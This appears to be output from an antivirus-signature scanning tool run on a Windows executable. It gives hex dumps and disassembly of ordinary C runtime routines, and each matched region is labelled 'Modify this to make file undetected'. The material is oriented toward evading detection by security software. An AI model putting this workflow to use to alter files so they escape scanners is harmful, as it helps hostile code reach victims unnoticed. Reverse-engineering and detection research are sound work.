000046A0   77 19 00 00 59 89 7D F8 56 E8 6D 19 00 00 59 8B    w...Y.}.V.m...Y.
000046B0   C3 5F 5E 5B C9 C3 8B FF 55 8B EC 8B 45 14 83 EC    ._^[....U...E...
000046C0   10 8B 4D 08 8B 55 10 56 8B 75 0C 57 8B 7D 18 83    ..M..U.V.u.W.}..
000046D0   27 00 C7 00 01 00 00 00 85 F6 74 08 89 16 83 C6    '.........t.....
000046E0   04 89 75 0C 53 32 DB C7 45 F8 20 00 00 00 C7 45    ..u.S2..E. ....E
000046F0   F4 09 00 00 00 6A 22 58 66 39 01 75 0A 84 DB 0F    .....j"Xf9.u....
00004700   94 C3 83 C1 02 EB 1A FF 07 85 D2 74 09 66 8B 01    ...........t.f..
00004710   66 89 02 83 C2 02 0F B7 01 83 C1 02 66 85 C0 74    f...........f..t
00004720   1F 84 DB 75 D0 66 3B 45 F8 74 09 66 3B 45 F4 6A    ...u.f;E.t.f;E.j
00004730   22 58 75 C4 85 D2 74 0B 33 C0 66 89 42 FE EB 03    "Xu...t.3.f.B...
00004740   83 E9 02 C6 45 FF 00 0F B7 01 8B F8 66 85 C0 74    ....E.......f..t
00004750   19 8B 5D F8 66 3B C3 74 09 0F B7 F8 66 3B 45 F4    ..].f;.t....f;E.
00004760   75 08 83 C1 02 0F B7 01 EB EA 66 85 FF 0F 84 C6    u.........f.....
00004770   00 00 00 85 F6 74 08 89                            .....t..

Match 38: 18432 (size: 544)

Dominant. Modify this to make file undetected

.text

00004800   F8 74 20 66 3B 45 F4 74 1A 83 7D F0 00 74 0C 85    .t f;E.t..}..t..
00004810   D2 74 06 66 89 02 83 C2 02 FF 07 83 C1 02 E9 64    .t.f...........d
00004820   FF FF FF 8B 75 0C 85 D2 74 08 33 C0 66 89 02 83    ....u...t.3.f...
00004830   C2 02 FF 07 E9 0E FF FF FF 5B 85 F6 74 03 83 26    .........[..t..&
00004840   00 8B 45 14 5F 5E FF 00 C9 C3 8B FF 55 8B EC 56    ..E._^......U..V
00004850   8B 75 08 81 FE FF FF FF 3F 73 39 83 C8 FF 8B 4D    .u......?s9....M
00004860   0C 33 D2 F7 75 10 3B C8 73 2A 0F AF 4D 10 C1 E6    .3..u.;.s*..M...
00004870   02 8B C6 F7 D0 3B C1 76 1B 8D 04 0E 6A 01 50 E8    .....;.v....j.P.
00004880   3A 17 00 00 6A 00 8B F0 E8 8E 17 00 00 83 C4 0C    :...j...........
00004890   8B C6 EB 02 33 C0 5E 5D C3 8B FF 55 8B EC 5D E9    ....3.^]...U..].
000048A0   E3 FC FF FF A1 F0 AE 41 00 85 C0 75 22 39 05 EC    .......A...u"9..
000048B0   AE 41 00 74 18 E8 16 00 00 00 85 C0 74 09 E8 97    .A.t........t...
000048C0   01 00 00 85 C0 75 06 A1 F0 AE 41 00 C3 33 C0 C3    .....u....A..3..
000048D0   83 3D F0 AE 41 00 00 74 03 33 C0 C3 56 57 E8 EA    .=..A..t.3..VW..
000048E0   49 00 00 8B F0 85 F6 75 05 83 CF FF EB 24 56 E8    I......u.....$V.
000048F0   2A 00 00 00 59 85 C0 75 05 83 CF FF EB 0C A3 F4    *...Y..u........
00004900   AE 41 00 33 FF A3 F0 AE 41 00 6A 00 E8 0A 17 00    .A.3....A.j.....
00004910   00 59 56 E8 03 17 00 00 59 8B C7 5F 5E C3 8B FF    .YV.....Y.._^...
00004920   55 8B EC 83 EC 0C 53 8B 5D 08 33 C0 89 45 FC 8B    U.....S.].3..E..
00004930   D0 56 57 0F B7 03 8B F3 66 85 C0 74 33 6A 3D 8B    .VW.....f..t3j=.
00004940   C8 5B 66 3B CB 74 01 42 8B CE 8D 79 02 66 8B 01    .[f;.t.B...y.f..
00004950   83 C1 02 66 3B 45 FC 75 F4 2B CF D1 F9 8D 34 4E    ...f;E.u.+....4N
00004960   83 C6 02 0F B7 06 8B C8 66 85 C0 75 D5 8B 5D 08    ........f..u..].
00004970   8D 42 01 6A 04 50 E8 43 16 00 00 8B F8 59 59 85    .B.j.P.C.....YY.
00004980   FF 0F 84 87 00 00 00 0F B7 03 89 7D F8 66 85 C0    ...........}.f..
00004990   74 7C 8B D0 8B CB 8D 71 02 66 8B 01 83 C1 02 66    t|.....q.f.....f
000049A0   3B 45 FC 75 F4 2B CE D1 F9 6A 3D 8D 41 01 59 89    ;E.u.+...j=.A.Y.
000049B0   45 F4 66 3B D1 74 38 6A 02 50 E8 FF 15 00 00 8B    E.f;.t8j.P......
000049C0   F0 59 59 85 F6 74 37 53 FF 75 F4 56 E8 55 39 00    .YY..t7S.u.V.U9.
000049D0   00 83 C4 0C 85 C0 75 46 8B 45 F8 89 30 83 C0 04    ......uF.E..0...
000049E0   89 45 F8 33 C0 50 E8 30 16 00 00 8B 45 F4 59 8D    .E.3.P.0....E.Y.
000049F0   1C 43 0F B7 03 8B D0 66 85 C0 75 98 EB 10 57 E8    .C.....f..u...W.
00004A00   27 00 00 00 33 FF 57 E8 0F 16 00 00 59 59 33 C0    '...3.W.....YY3.
00004A10   50 E8 05 16 00 00 59 8B C7 5F 5E 5B C9 C3 33 C0    P.....Y.._^[..3.

Match 39: 19248 (size: 272)

Dominant. Modify this to make file undetected

.text

00004B30   FE FF FF 59 5D C3 E9 69 FD FF FF 68 00 57 40 00    ...Y]..i...h.W@.
00004B40   B9 EC AE 41 00 E8 8D FF FF FF 68 1B 57 40 00 B9    ...A......h.W@..
00004B50   F0 AE 41 00 E8 7E FF FF FF FF 35 F8 AE 41 00 E8    ..A..~....5..A..
00004B60   C7 FE FF FF FF 35 F4 AE 41 00 E8 BC FE FF FF 59    .....5..A......Y
00004B70   59 C3 A1 F4 AE 41 00 85 C0 75 0A E8 24 FD FF FF    Y....A...u..$...
00004B80   A3 F4 AE 41 00 C3 E9 45 FD FF FF 8B FF 55 8B EC    ...A...E.....U..
00004B90   51 8B 45 0C 53 56 8B 75 08 2B C6 83 C0 03 57 33    Q.E.SV.u.+....W3
00004BA0   FF C1 E8 02 39 75 0C 1B DB F7 D3 23 D8 74 1C 8B    ....9u.....#.t..
00004BB0   06 89 45 FC 85 C0 74 0B 8B C8 FF 15 20 21 41 00    ..E...t..... !A.
00004BC0   FF 55 FC 83 C6 04 47 3B FB 75 E4 5F 5E 5B C9 C3    .U....G;.u._^[..
00004BD0   8B FF 55 8B EC 56 8B 75 08 57 EB 17 8B 3E 85 FF    ..U..V.u.W...>..
00004BE0   74 0E 8B CF FF 15 20 21 41 00 FF D7 85 C0 75 0A    t..... !A.....u.
00004BF0   83 C6 04 3B 75 0C 75 E4 33 C0 5F 5E 5D C3 6A 08    ...;u.u.3._^].j.
00004C00   68 A8 8F 41 00 E8 E6 C7 FF FF 8B 45 08 FF 30 E8    h..A.......E..0.
00004C10   D8 4A 00 00 59 83 65 FC 00 8B 4D 0C E8 2A 00 00    .J..Y.e...M..*..
00004C20   00 C7 45 FC FE FF FF FF E8 12 00 00 00 8B 4D F0    ..E...........M.
00004C30   64 89 0D 00 00 00 00 59 5F 5E 5B C9 C2 0C 00 8B    d......Y_^[.....

0x4b20: 0x00405720 8b4508 mov eax, dword [ebp + 8]
0x4b23: 0x00405723 8b00 mov eax, dword [eax]
0x4b25: 0x00405725 3b05f4ae4100 cmp eax, dword [0x41aef4] ; [0x41aef4:4]=0
0x4b2b: < 0x0040572b 7407 je 0x405734
0x4b2d: 0x0040572d 50 push eax
0x4b2e: 0x0040572e e8f8feffff call fcn.0040562b
0x4b33: 0x00405733 59 pop ecx
0x4b34: ; CODE XREF from fcn.004056d7 @ +0x54(x)
0x4b34: > 0x00405734 5d pop ebp
0x4b35: 0x00405735 c3 ret
0x4b36: ; CALL XREF from fcn.0040a2a0 @ 0x409f90(x)
0x4b36: 5: fcn.00405736 ();
0x4b36: < 0x00405736 e969fdffff jmp fcn.004054a4
0x4b3b: ; CALL XREF from fcn.00405f75 @ +0x5a(x)
0x4b3b: 55: fcn.0040573b ();
0x4b3b: 0x0040573b 6800574000 push 0x405700
0x4b40: 0x00405740 b9ecae4100 mov ecx, 0x41aeec
0x4b45: 0x00405745 e88dffffff call fcn.004056d7
0x4b4a: 0x0040574a 681b574000 push 0x40571b ; '@'
0x4b4f: 0x0040574f b9f0ae4100 mov ecx, 0x41aef0
0x4b54: 0x00405754 e87effffff call fcn.004056d7
0x4b59: 0x00405759 ff35f8ae4100 push dword [0x41aef8]
0x4b5f: 0x0040575f e8c7feffff call fcn.0040562b
0x4b64: 0x00405764 ff35f4ae4100 push dword [0x41aef4]
0x4b6a: 0x0040576a e8bcfeffff call fcn.0040562b
0x4b6f: 0x0040576f 59 pop ecx
0x4b70: 0x00405770 59 pop ecx
0x4b71: 0x00405771 c3 ret
0x4b72: ; CALL XREF from entry0 @ 0x40188a(x)
0x4b72: 20: fcn.00405772 ();
0x4b72: 0x00405772 a1f4ae4100 mov eax, dword [0x41aef4] ; [0x41aef4:4]=0
0x4b77: 0x00405777 85c0 test eax, eax
0x4b79: < 0x00405779 750a jne 0x405785
0x4b7b: 0x0040577b e824fdffff call fcn.004054a4
0x4b80: 0x00405780 a3f4ae4100 mov dword [0x41aef4], eax ; [0x41aef4:4]=0
0x4b85: ; CODE XREF from fcn.00405772 @ 0x405779(x)
0x4b85: > 0x00405785 c3 ret
0x4b86: ; CALL XREF from fcn.004016d9 @ +0x9d(x)
0x4b86: 5: fcn.00405786 ();
0x4b86: < 0x00405786 e945fdffff jmp fcn.004054d0
0x4b8b: ; CALL XREF from entry0 @ 0x401823(x)
0x4b8b: ; CALL XREFS from fcn.0040584b @ 0x4058d0(x), 0x4058e1(x)
0x4b8b: 69: fcn.0040578b (int32_t arg_8h, uint32_t arg_ch);
0x4b8b: ; arg int32_t arg_8h @ ebp+0x8
0x4b8b: ; arg uint32_t arg_ch @ ebp+0xc
0x4b8b: ; var int32_t var_4h @ ebp-0x4
0x4b8b: 0x0040578b 8bff mov edi, edi
0x4b8d: 0x0040578d 55 push ebp
0x4b8e: 0x0040578e 8bec mov ebp, esp
0x4b90: 0x00405790 51 push ecx
0x4b91: 0x00405791 8b450c mov eax, dword [arg_ch]
0x4b94: 0x00405794 53 push ebx
0x4b95: 0x00405795 56 push esi
0x4b96: 0x00405796 8b7508 mov esi, dword [arg_8h]
0x4b99: 0x00405799 2bc6 sub eax, esi
0x4b9b: 0x0040579b 83c003 add eax, 3
0x4b9e: 0x0040579e 57 push edi
0x4b9f: 0x0040579f 33ff xor edi, edi
0x4ba1: 0x004057a1 c1e802 shr eax, 2
0x4ba4: 0x004057a4 39750c cmp dword [arg_ch], esi
0x4ba7: 0x004057a7 1bdb sbb ebx, ebx
0x4ba9: 0x004057a9 f7d3 not ebx
0x4bab: 0x004057ab 23d8 and ebx, eax
0x4bad: < 0x004057ad 741c je 0x4057cb
0x4baf: ; CODE XREF from fcn.0040578b @ 0x4057c9(x)
0x4baf: > 0x004057af 8b06 mov eax, dword [esi]
0x4bb1: 0x004057b1 8945fc mov dword [var_4h], eax
0x4bb4: 0x004057b4 85c0 test eax, eax
0x4bb6: < 0x004057b6 740b je 0x4057c3
0x4bb8: 0x004057b8 8bc8 mov ecx, eax
0x4bba: 0x004057ba ff1520214100 call dword [0x412120]
0x4bc0: 0x004057c0 ff55fc call dword [var_4h]
0x4bc3: ; CODE XREF from fcn.0040578b @ 0x4057b6(x)
0x4bc3: > 0x004057c3 83c604 add esi, 4
0x4bc6: 0x004057c6 47 inc edi
0x4bc7: 0x004057c7 3bfb cmp edi, ebx
0x4bc9: < 0x004057c9 75e4 jne 0x4057af
0x4bcb: ; CODE XREF from fcn.0040578b @ 0x4057ad(x)
0x4bcb: > 0x004057cb 5f pop edi
0x4bcc: 0x004057cc 5e pop esi
0x4bcd: 0x004057cd 5b pop ebx
0x4bce: 0x004057ce c9 leave
0x4bcf: 0x004057cf c3 ret
0x4bd0: ; CALL XREF from entry0 @ 0x4017fd(x)
0x4bd0: 46: fcn.004057d0 (int32_t arg_8h, uint32_t arg_ch);
0x4bd0: ; arg int32_t arg_8h @ ebp+0x8
0x4bd0: ; arg uint32_t arg_ch @ ebp+0xc
0x4bd0: 0x004057d0 8bff mov edi, edi
0x4bd2: 0x004057d2 55 push ebp
0x4bd3: 0x004057d3 8bec mov ebp, esp
0x4bd5: 0x004057d5 56 push esi
0x4bd6: 0x004057d6 8b7508 mov esi, dword [arg_8h]
0x4bd9: 0x004057d9 57 push edi
0x4bda: < 0x004057da eb17 jmp 0x4057f3
0x4bdc: ; CODE XREF from fcn.004057d0 @ 0x4057f6(x)
0x4bdc: > 0x004057dc 8b3e mov edi, dword [esi]
0x4bde: 0x004057de 85ff test edi, edi
0x4be0: < 0x004057e0 740e je 0x4057f0
0x4be2: 0x004057e2 8bcf mov ecx, edi
0x4be4: 0x004057e4 ff1520214100 call dword [0x412120]
0x4bea: 0x004057ea ffd7 call edi
0x4bec: 0x004057ec 85c0 test eax, eax
0x4bee: < 0x004057ee 750a jne 0x4057fa
0x4bf0: ; CODE XREF from fcn.004057d0 @ 0x4057e0(x)
0x4bf0: > 0x004057f0 83c604 add esi, 4
0x4bf3: ; CODE XREF from fcn.004057d0 @ 0x4057da(x)
0x4bf3: > 0x004057f3 3b750c cmp esi, dword [arg_ch]
0x4bf6: < 0x004057f6 75e4 jne 0x4057dc
0x4bf8: 0x004057f8 33c0 xor eax, eax
0x4bfa: ; CODE XREF from fcn.004057d0 @ 0x4057ee(x)
0x4bfa: > 0x004057fa 5f pop edi
0x4bfb: 0x004057fb 5e pop esi
0x4bfc: 0x004057fc 5d pop ebp
0x4bfd: 0x004057fd c3 ret
0x4bfe: ; CALL XREF from fcn.00405938 @ 0x405986(x)
0x4bfe: 65: fcn.004057fe (int32_t arg_8h, int32_t arg_ch);
0x4bfe: ; arg int32_t arg_8h @ ebp+0x8
0x4bfe: ; arg int32_t arg_ch @ ebp+0xc
0x4bfe: ; var int32_t var_4h @ ebp-0x4
0x4bfe: ; var int32_t var_10h @ ebp-0x10
0x4bfe: 0x004057fe 6a08 push 8 ; 8
0x4c00: 0x00405800 68a88f4100 push 0x418fa8
0x4c05: 0x00405805 e8e6c7ffff call fcn.00401ff0
0x4c0a: 0x0040580a 8b4508 mov eax, dword [arg_8h]
0x4c0d: 0x0040580d ff30 push dword [eax]
0x4c0f: 0x0040580f e8d84a0000 call fcn.0040a2ec
0x4c14: 0x00405814 59 pop ecx
0x4c15: 0x00405815 8365fc00 and dword [var_4h], 0
0x4c19: 0x00405819 8b4d0c mov ecx, dword [arg_ch]
0x4c1c: 0x0040581c e82a000000 call fcn.0040584b
0x4c21: 0x00405821 c745fcfeffff. mov dword [var_4h], 0xfffffffe ; 4294967294
0x4c28: 0x00405828 e812000000 call fcn.0040583f
0x4c2d: 0x0040582d 8b4df0 mov ecx, dword [var_10h]
0x4c30: 0x00405830 64890d000000. mov dword fs:[0], ecx
0x4c37: 0x00405837 59 pop ecx
0x4c38: 0x00405838 5f pop edi
0x4c39: 0x00405839 5e pop esi
0x4c3a: 0x0040583a 5b pop ebx
0x4c3b: 0x0040583b c9 leave
0x4c3c: 0x0040583c c20c00 ret 0xc
0x4c3f: ; CALL XREF from fcn.004057fe @ 0x405828(x)
0x4c3f: 12: fcn.0040583f (int32_t arg_10h);
0x4c3f: ; arg int32_t arg_10h @ ebp+0x10
0x4c3f: 0x0040583f 8b4510 mov eax, dword [arg_10h]
0x4c42: 0x00405842 ff30 push dword [eax]
0x4c44: 0x00405844 e8eb4a0000 call fcn.0040a334
0x4c49: 0x00405849 59 pop ecx
0x4c4a: 0x0040584a c3 ret
0x4c4b: ; CALL XREF from fcn.004057fe @ 0x40581c(x)
0x4c4b: 193: fcn.0040584b ();
0x4c4b: ; var int32_t var_4h @ ebp-0x4
0x4c4b: ; var int32_t var_10h @ ebp-0x10
0x4c4b: 0x0040584b 6a08 push 8 ; 8
0x4c4d: 0x0040584d 68 invalid
0x4c4e: 0x0040584e 88 invalid
0x4c4f: 0x0040584f 8f invalid

Match 40: 19996 (size: 68)

Dominant. Modify this to make file undetected

.text

00004E1C   00 FF D6 5E 83 7D FC 00 74 09 FF 75 FC FF 15 70    ...^.}..t..u...p
00004E2C   20 41 00 C9 C3 8B FF 55 8B EC 8B 45 08 A3 00 AF     A.....U...E....
00004E3C   41 00 5D C3 6A 01 6A 02 6A 00 E8 ED FE FF FF 83    A.].j.j.j.......
00004E4C   C4 0C C3 6A 01 6A 00 6A 00 E8 DE FE FF FF 83 C4    ...j.j.j........
00004E5C   0C C3 8B FF                                        ....

0x4e0c: 0x00405a0c 8bf0 mov esi, eax
0x4e0e: 0x00405a0e 85f6 test esi, esi
0x4e10: < 0x00405a10 740d je 0x405a1f
0x4e12: 0x00405a12 ff7508 push dword [arg_8h]
0x4e15: 0x00405a15 8bce mov ecx, esi
0x4e17: 0x00405a17 ff1520214100 call dword [0x412120]
0x4e1d: 0x00405a1d ffd6 call esi
0x4e1f: ; CODE XREF from fcn.004059de @ 0x405a10(x)
0x4e1f: > 0x00405a1f 5e pop esi
0x4e20: ; CODE XREF from fcn.004059de @ 0x4059fb(x)
0x4e20: > 0x00405a20 837dfc00 cmp dword [hLibModule], 0
0x4e24: < 0x00405a24 7409 je 0x405a2f
0x4e26: 0x00405a26 ff75fc push dword [hLibModule] ; HMODULE hLibModule
0x4e29: 0x00405a29 ff1570204100 call dword [sym.imp.KERNEL32.dll_FreeLibrary] ; 0x412070 ; BOOL FreeLibrary(HMODULE hLibModule)
0x4e2f: ; CODE XREF from fcn.004059de @ 0x405a24(x)
0x4e2f: > 0x00405a2f c9 leave
0x4e30: 0x00405a30 c3 ret
0x4e31: ; CALL XREF from fcn.00405f75 @ +0x84(x)
0x4e31: 15: fcn.00405a31 (int32_t arg_8h);
0x4e31: ; arg int32_t arg_8h @ ebp+0x8
0x4e31: 0x00405a31 8bff mov edi, edi
0x4e33: 0x00405a33 55 push ebp
0x4e34: 0x00405a34 8bec mov ebp, esp
0x4e36: 0x00405a36 8b4508 mov eax, dword [arg_8h]
0x4e39: 0x00405a39 a300af4100 mov dword [0x41af00], eax ; [0x41af00:4]=0
0x4e3e: 0x00405a3e 5d pop ebp
0x4e3f: 0x00405a3f c3 ret
0x4e40: ; CALL XREF from fcn.004016d9 @ +0x220(x)
0x4e40: 15: fcn.00405a40 ();
0x4e40: 0x00405a40 6a01 push 1 ; 1
0x4e42: 0x00405a42 6a02 push 2 ; 2
0x4e44: 0x00405a44 6a00 push 0
0x4e46: 0x00405a46 e8edfeffff call fcn.00405938
0x4e4b: 0x00405a4b 83c40c add esp, 0xc
0x4e4e: 0x00405a4e c3 ret
0x4e4f: ; CALL XREF from entry0 @ 0x4018b8(x)
0x4e4f: 15: fcn.00405a4f ();
0x4e4f: 0x00405a4f 6a01 push 1 ; 1
0x4e51: 0x00405a51 6a00 push 0
0x4e53: 0x00405a53 6a00 push 0 ; int32_t arg_8h
0x4e55: 0x00405a55 e8defeffff call fcn.00405938
0x4e5a: 0x00405a5a 83c40c add esp, 0xc
0x4e5d: 0x00405a5d c3 ret
0x4e5e: ; CALL XREF from entry0 @ 0x401928(x)
0x4e5e: ; CALL XREF from fcn.004061da @ 0x406218(x)
0x4e5e: ; CALL XREF from fcn.0040b09f @ 0x40b28c(x)
0x4e5e: 22: fcn.00405a5e (int32_t arg_8h);
0x4e5e: ; arg int32_t arg_8h @ ebp+0x8
0x4e5e: 0x00405a5e 8bff mov edi, edi
0x4e60: 0x00405a60 55 push ebp
0x4e61: 0x00405a61 8bec mov ebp, esp
0x4e63: 0x00405a63 6a00 push 0
0x4e65: 0x00405a65 6a02 push 2 ; 2
0x4e67: 0x00405a67 ff7508 push dword [arg_8h]
0x4e6a: 0x00405a6a e8c9feffff call fcn.00405938
0x4e6f: 0x00405a6f 83 invalid

Match 41: 20132 (size: 136)

Dominant. Modify this to make file undetected

.text

00004EA4   75 08 E8 8D FE FF FF 83 C4 0C 5D C3 8B FF 55 8B    u.........]...U.
00004EB4   EC 8B 45 08 3D 00 40 00 00 74 23 3D 00 80 00 00    ..E.=.@..t#=....
00004EC4   74 1C 3D 00 00 01 00 74 15 E8 D9 10 00 00 C7 00    t.=....t........
00004ED4   16 00 00 00 E8 11 10 00 00 6A 16 58 5D C3 B9 A4    .........j.X]...
00004EE4   B3 41 00 87 01 33 C0 5D C3 FF 15 00 20 41 00 A3    .A...3.].... A..
00004EF4   18 AF 41 00 FF 15 98 20 41 00 A3 1C AF 41 00 B0    ..A.... A....A..
00004F04   01 C3 B8 0C AF 41 00 C3 B8 14 AF 41 00 C3 6A 0C    .....A.....A..j.
00004F14   68 C8 8F 41 00 E8 D2 C4 FF FF 8B 45 08 FF 30 E8    h..A.......E..0.
00004F24   C4 47 00 00 59 83 65 FC                            .G..Y.e.

0x4e98: 0x00405a98 5d pop ebp
0x4e99: 0x00405a99 c3 ret
0x4e9a: ; CALL XREF from entry0 @ 0x401920(x)
0x4e9a: 22: fcn.00405a9a (int32_t arg_8h);
0x4e9a: ; arg int32_t arg_8h @ ebp+0x8
0x4e9a: 0x00405a9a 8bff mov edi, edi
0x4e9c: 0x00405a9c 55 push ebp
0x4e9d: 0x00405a9d 8bec mov ebp, esp
0x4e9f: 0x00405a9f 6a00 push 0
0x4ea1: 0x00405aa1 6a00 push 0
0x4ea3: 0x00405aa3 ff7508 push dword [arg_8h]
0x4ea6: 0x00405aa6 e88dfeffff call fcn.00405938
0x4eab: 0x00405aab 83c40c add esp, 0xc
0x4eae: 0x00405aae 5d pop ebp
0x4eaf: 0x00405aaf c3 ret
0x4eb0: ; CALL XREF from fcn.004016d9 @ +0x1c(x)
0x4eb0: 61: fcn.00405ab0 (int32_t arg_8h);
0x4eb0: ; arg int32_t arg_8h @ ebp+0x8
0x4eb0: 0x00405ab0 8bff mov edi, edi
0x4eb2: 0x00405ab2 55 push ebp
0x4eb3: 0x00405ab3 8bec mov ebp, esp
0x4eb5: 0x00405ab5 8b4508 mov eax, dword [arg_8h]
0x4eb8: 0x00405ab8 3d00400000 cmp eax, 0x4000
0x4ebd: < 0x00405abd 7423 je 0x405ae2
0x4ebf: 0x00405abf 3d00800000 cmp eax, 0x8000
0x4ec4: < 0x00405ac4 741c je 0x405ae2
0x4ec6: 0x00405ac6 3d00000100 cmp eax, 0x10000
0x4ecb: < 0x00405acb 7415 je 0x405ae2
0x4ecd: 0x00405acd e8d9100000 call fcn.00406bab
0x4ed2: 0x00405ad2 c70016000000 mov dword [eax], 0x16 ; [0x16:4]=-1 ; 22
0x4ed8: 0x00405ad8 e811100000 call fcn.00406aee
0x4edd: 0x00405add 6a16 push 0x16 ; 22
0x4edf: 0x00405adf 58 pop eax
0x4ee0: 0x00405ae0 5d pop ebp
0x4ee1: 0x00405ae1 c3 ret
0x4ee2: ; CODE XREFS from fcn.00405ab0 @ 0x405abd(x), 0x405ac4(x), 0x405acb(x)
0x4ee2: > 0x00405ae2 b9a4b34100 mov ecx, 0x41b3a4
0x4ee7: 0x00405ae7 8701 xchg dword [ecx], eax
0x4ee9: 0x00405ae9 33c0 xor eax, eax
0x4eeb: 0x00405aeb 5d pop ebp
0x4eec: 0x00405aec c3 ret
0x4eed: 0x00405aed ff1500204100 call dword [sym.imp.KERNEL32.dll_GetCommandLineA] ; 0x412000 ; "p\x97\x01" ; LPSTR GetCommandLineA(void)
0x4ef3: 0x00405af3 a318af4100 mov dword [0x41af18], eax ; [0x41af18:4]=0
0x4ef8: 0x00405af8 ff1598204100 call dword [sym.imp.KERNEL32.dll_GetCommandLineW] ; 0x412098 ; LPWSTR GetCommandLineW(void)
0x4efe: 0x00405afe a31caf4100 mov dword [0x41af1c], eax ; [0x41af1c:4]=0
0x4f03: 0x00405b03 b001 mov al, 1
0x4f05: 0x00405b05 c3 ret
0x4f06: ; CALL XREF from entry0 @ 0x401898(x)
0x4f06: 6: fcn.00405b06 ();
0x4f06: 0x00405b06 b80caf4100 mov eax, 0x41af0c
0x4f0b: 0x00405b0b c3 ret
0x4f0c: ; CALL XREF from entry0 @ 0x401891(x)
0x4f0c: 6: fcn.00405b0c ();
0x4f0c: 0x00405b0c b814af4100 mov eax, 0x41af14
0x4f11: 0x00405b11 c3 ret
0x4f12: ; CALL XREF from fcn.00405b80 @ +0x2b(x)
0x4f12: 98: fcn.00405b12 (int32_t arg_8h);
0x4f12: ; arg int32_t arg_8h @ ebp+0x8
0x4f12: ; var int32_t var_4h @ ebp-0x4
0x4f12: ; var int32_t var_10h @ ebp-0x10
0x4f12: ; var int32_t var_1ch @ ebp-0x1c
0x4f12: 0x00405b12 6a0c push 0xc ; 12
0x4f14: 0x00405b14 68c88f4100 push 0x418fc8
0x4f19: 0x00405b19 e8d2c4ffff call fcn.00401ff0
0x4f1e: 0x00405b1e 8b4508 mov eax, dword [arg_8h]
0x4f21: 0x00405b21 ff30 push dword [eax]
0x4f23: 0x00405b23 e8c4470000 call fcn.0040a2ec
0x4f28: 0x00405b28 59 pop ecx
0x4f29: 0x00405b29 8365fc00 and dword [var_4h], 0
0x4f2d: 0x00405b2d be38b24100 mov esi, 0x41b238
0x4f32: 0x00405b32 bf38a14100 mov edi, 0x41a138
0x4f37: ; CODE XREF from fcn.00405b12 @ 0x405b54(x)
0x4f37: 0x00405b37 8975e4 mov dword [var_1ch], esi
0x4f3a: 0x00405b3a 81 invalid
0x4f3b: 0x00405b3b fe invalid

Match 42: 20336 (size: 748)

Dominant. Modify this to make file undetected

.text

00004F70   C9 C2 0C 00 8B 45 10 FF 30 E8 B6 47 00 00 59 C3    .....E..0..G..Y.
00004F80   33 C0 B9 20 AF 41 00 40 87 01 C3 8B FF 55 8B EC    3.. .A.@.....U..
00004F90   83 EC 0C 6A 04 58 89 45 F8 8D 4D FF 89 45 F4 8D    ...j.X.E..M..E..
00004FA0   45 F8 50 8D 45 FF 50 8D 45 F4 50 E8 62 FF FF FF    E.P.E.P.E.P.b...
00004FB0   C9 C3 8B FF 55 8B EC 56 E8 CF 22 00 00 8B 55 08    ....U..V.."...U.
00004FC0   8B F0 6A 00 58 8B 8E 50 03 00 00 F6 C1 02 0F 94    ..j.X..P........
00004FD0   C0 40 83 FA FF 74 33 85 D2 74 36 83 FA 01 74 1F    .@...t3..t6...t.
00004FE0   83 FA 02 74 15 E8 C1 0F 00 00 C7 00 16 00 00 00    ...t............
00004FF0   E8 F9 0E 00 00 83 C8 FF EB 17 83 E1 FD EB 03 83    ................
00005000   C9 02 89 8E 50 03 00 00 EB 07 83 0D 80 A7 41 00    ....P.........A.
00005010   FF 5E 5D C3 A1 24 AF 41 00 90 C3 8B FF 55 8B EC    .^]..$.A.....U..
00005020   8B 45 08 85 C0 74 1A 83 F8 01 74 15 E8 7A 0F 00    .E...t....t..z..
00005030   00 C7 00 16 00 00 00 E8 B2 0E 00 00 83 C8 FF 5D    ...............]
00005040   C3 B9 24 AF 41 00 87 01 5D C3 B8 28 AF 41 00 C3    ..$.A...]..(.A..
00005050   6A 0C 68 08 90 41 00 E8 94 C3 FF FF 83 65 E4 00    j.h..A.......e..
00005060   8B 45 08 FF 30 E8 82 46 00 00 59 83 65 FC 00 8B    .E..0..F..Y.e...
00005070   4D 0C E8 B8 01 00 00 8B F0 89 75 E4 C7 45 FC FE    M.........u..E..
00005080   FF FF FF E8 17 00 00 00 8B C6 8B 4D F0 64 89 0D    ...........M.d..
00005090   00 00 00 00 59 5F 5E 5B C9 C2 0C 00 8B 75 E4 8B    ....Y_^[.....u..
000050A0   45 10 FF 30 E8 8B 46 00 00 59 C3 6A 0C 68 E8 8F    E..0..F..Y.j.h..
000050B0   41 00 E8 39 C3 FF FF 83 65 E4 00 8B 45 08 FF 30    A..9....e...E..0
000050C0   E8 27 46 00 00 59 83 65 FC 00 8B 4D 0C E8 34 00    .'F..Y.e...M..4.
000050D0   00 00 8B F0 89 75 E4 C7 45 FC FE FF FF FF E8 17    .....u..E.......
000050E0   00 00 00 8B C6 8B 4D F0 64 89 0D 00 00 00 00 59    ......M.d......Y
000050F0   5F 5E 5B C9 C2 0C 00 8B 75 E4 8B 45 10 FF 30 E8    _^[.....u..E..0.
00005100   30 46 00 00 59 C3 8B FF 55 8B EC 83 EC 0C 8B C1    0F..Y...U.......
00005110   89 45 F8 53 56 8B 00 57 8B 30 85 F6 0F 84 05 01    .E.SV..W.0......
00005120   00 00 A1 04 A0 41 00 8B C8 8B 1E 83 E1 1F 8B 7E    .....A.........~
00005130   04 33 D8 8B 76 08 33 F8 33 F0 D3 CF D3 CE D3 CB    .3..v.3.3.......
00005140   3B FE 0F 85 9D 00 00 00 2B F3 B8 00 02 00 00 C1    ;.......+.......
00005150   FE 02 3B F0 77 02 8B C6 8D 3C 30 85 FF 75 03 6A    ..;.w....<0..u.j
00005160   20 5F 3B FE 72 1D 6A 04 57 53 E8 64 50 00 00 6A     _;.r.j.WS.dP..j
00005170   00 89 45 FC E8 A2 0E 00 00 8B 4D FC 83 C4 10 85    ..E.......M.....
00005180   C9 75 24 6A 04 8D 7E 04 57 53 E8 44 50 00 00 6A    .u$j..~.WS.DP..j
00005190   00 89 45 FC E8 82 0E 00 00 8B 4D FC 83 C4 10 85    ..E.......M.....
000051A0   C9 0F 84 80 00 00 00 8D 04 B1 8B D9 89 45 FC 8D    .............E..
000051B0   34 B9 A1 04 A0 41 00 8B 7D FC 8B CF 89 45 F4 8B    4....A..}....E..
000051C0   C6 2B C7 83 C0 03 C1 E8 02 3B F7 1B D2 F7 D2 23    .+.......;.....#
000051D0   D0 74 12 8B 7D F4 33 C0 40 89 39 8D 49 04 3B C2    .t..}.3.@.9.I.;.
000051E0   75 F6 8B 7D FC 8B 45 F8 8B 40 04 FF 30 E8 08 F3    u..}..E..@..0...
